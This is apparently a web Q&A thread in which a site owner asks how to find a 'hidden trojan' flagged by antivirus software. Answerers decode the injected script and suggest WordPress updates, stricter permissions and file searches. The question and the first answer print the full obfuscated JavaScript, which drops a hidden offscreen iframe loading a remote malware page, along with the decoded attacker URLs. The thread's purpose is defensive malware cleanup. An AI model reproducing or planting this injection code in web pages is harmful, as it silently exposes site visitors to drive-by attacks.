Hidden Trojan on my wesbite - How to find it?
Solution 1
The reported URL www.f1arab.com does not contain this piece of JS code at first sight.
So, looking at the script we can figure out what it is trying to sent you to:
var wow = "b3nimb2eawiki11b1infob1ms"; var url = "h"+"ttp"+":/"+"/"+wow.replace(/ea/g,"-").replace(/b3/g,"a").replace(/b2/g, "e").replace(/b1/g,".")+":8"+"1/"+"rem"+"2."+"htm"+"l"; document.write(url);
which yields:
http://anime-wiki11.info.ms:81/rem2.html
Let's query this URL, twice, we see on the first that it can't find a page on Yahoo and the second can't load this. As you search the b3nimb2eawiki11b1infob1ms string on Google you see that these exploit attempts are quite dated, and it appears that Yahoo already took them offline.
Searching for the URL you obtain, you see my attempts to query it as well as two sites also infected with this script. But as it shows, the script is no longer harmful so it is safe to visit both URLs assuming Yahoo doesn't put it back.
When doing yet another check with urlQuery on the reported URL we see this request happening:
GET /rem2.html HTTP/1.1
Host: mrzwheremeread.info.br.ms:81
But once again this URL leads to something Yahoo already took offline.
The interesting thing is that this is different from the URL shown in your question, thus it is being dynamically generated. So that's why a quick search earlier on did not find the JS code.
This is evidenced by the following HTML code being injected at a certain point:
<script type="text/javascript">/*<![CDATA[*/var wow="mrzwhb2rb2mb2rb2b3db1infob1brb1ms";c1="l"+"on"+"l"+"y";if(-1==document.cookie.indexOf(c1)){var a=new Date;a.setTime(a.getTime());c3=72E6;c2=new Date(a.getTime()+c3);document.cookie=c1+"="+escape(c2.toGMTString())+";e"+"xpir"+"es="+c2.toGMTString()+";p"+"at"+"h=/";var a=document.createElement("if"+"r"+"am"+"e");a.setAttribute("sr"+"c","h"+"ttp"+":/"+"/"+wow.replace(/ea/g,"-").replace(/b3/g,"a").replace(/b2/g,"e").replace(/b1/g,".")+":8"+"1/"+"rem"+"2."+"htm"+"l");a.style.position="ab"+"sol"+"ute";a.style.width="1"+"8p"+"x";a.setAttribute("f"+"ra"+"mebo"+"rd"+"er",navigator.userAgent.indexOf("1"+"23"+"4231"+"532"+"4")+1);a.style.left="-"+"57"+"50"+"p"+"x";document.write("<"+"di"+"v i"+"d='d"+"efus"+"e'>"+"</di"+"v>");document.getElementById("de"+"f"+"us"+"e").appendChild(a)};/*]]>*/</script>
As we can see on urlQuery that this code isn't being injected through JavaScript, this must be happening server side. What we also see here through wp-content
is that you are using WordPress, so it most likely that they are using a WordPress exploit to insert that code.
Start byupdating WordPress and the plugins, as well as disabling things that you don't need. From there on, you can look into making file permissions a bit more restrictive on the server; as well as PHP settings to disallow writing from / to places you don't want to.
Also, search for var wow
or just wow
over all hosted files on the server would be a nice approach as that seems to be not dynamic, please note that it might appear in an encrypted form which might require you to search manually...
Solution 2
You can also scan your site at http://sitecheck.sucuri.net/scanner/
Common forms of malware inject php code into your index.php files which generate the javascript. The PHP doesn't look like the javascript, it may be base64 encoded it may not.
It's also possible you have rogue php files on your site inserting the code into your index files as well. In that case you need to find those files. Good hosting companies can scan your account quickly to find backdoor shells.
If you run WordPress it may also be coming from entries in your database.
Related videos on Youtube
Kilwa2012
Updated on September 18, 2022Comments
-
Kilwa2012 almost 2 years
I have a big problem. Kaspersky says my website is infected with trojan. So I downloaded all my website and run a scan and it was clean. I also did a clamav on it and it was clean too.
So next thing I told few guys to test it and when they go to my website the warning appear, not only Kaspersky but Norton too.
I think it's a hidden trojan, like when you refresh the page you see the warning while it's hidden in files.
Kaspersky gave me the following code
<script type='text/javascript'>/*<![CDATA[*/var wow="b3nimb2eawiki11b1infob1ms";c1="l"+"on"+"l"+"y ";if(-1==document.cookie.indexOf(c1)){var a=new Date;a.setTime(a.getTime());c3=72E6;c2=new Date(a.getTime()+c3);document.cookie=c1+"="+escape(c2.toGMTString())+";e"+"xpir"+"es="+c 2.toGMTString()+";p"+"at"+"h=/";var a=document.createElement("if"+"r"+"am"+"e");a.setAttribute("sr"+"c","h"+"ttp"+":/"+"/"+wow.replace(/ea/g,"-").replace(/b3/g,"a").replace(/b2/g, "e").replace(/b1/g,".")+":8"+"1/"+"rem"+"2."+"htm"+"l");a.style.position="ab"+"sol"+"ute";a.style.width="1"+"8p"+"x";a.setAttribute("f"+"ra"+"mebo"+"rd"+"er",navigator.userAgent.i ndexOf("1"+"23"+"4231"+"532"+"4")+1);a.style.left="-"+"57"+"50"+"p"+"x";document.write("<"+"di"+"v i"+"d='d"+"efus"+"e'>"+"</di"+"v>");document.getElementById("de"+"f"+"us"+"e").a ppendChild(a)};/*]]>*/</script>
So now I am lost, what can i do?
-
Admin almost 12 yearsPlease don't cross post questions. Your Super User question could have been migrated.
-
Admin almost 12 yearsYou need to include what server you're using, what programming language you are using and any third party software you're using eg Wordpress.
-
-
John Conde almost 12 yearsI didn't say I envied them!
-
Kilwa2012 almost 12 yearsHello, I found 2 infected files after hours and hours of work. I would like to thanks TomWij for his help. Please guys can you check if my site is working for you now?
-
bekay almost 12 yearsI would suggest you ask your hosting company to do a scan as well. If this helped you feel free to mark it as the answer.